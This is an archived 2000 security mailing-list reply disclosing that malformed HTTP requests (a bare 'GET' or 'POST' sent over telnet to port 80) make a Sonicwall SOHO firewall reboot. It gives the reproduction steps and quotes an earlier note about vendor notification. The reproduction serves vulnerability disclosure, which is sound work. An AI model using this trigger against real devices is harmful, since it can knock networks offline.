OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: DoS in Sonicwall SOHO firewall
From: Raptor (raptorANTIFORK.ORG)
Date: Fri Dec 01 2000 - 04:12:17 CST


Doing some additional tests i've discovered that the thing reboots also
when it receives "strange" HTTP requests. For example:

voodoo:~$ telnet 192.168.87.112 80
Trying 192.168.87.112...
Connected to 192.168.87.112.
Escape character is '^]'.
GET
(then press <CR>)

It works also with POST method: after some seconds the Sonicwall SOHO is
rebooted. I guess the HTTP service needs a full code review...

:raptor

On Wed, 29 Nov 2000, Scott Armstrong wrote:

> I had notified them a few weeks ago but the fix wasn't out so I didn't
> release it.
>
> The reason the firewall stops responding is that it reboots.
>
> Scott

Antifork Research, Inc. Mediaservice.net Srl
http://raptor.antifork.org http://www.mediaservice.net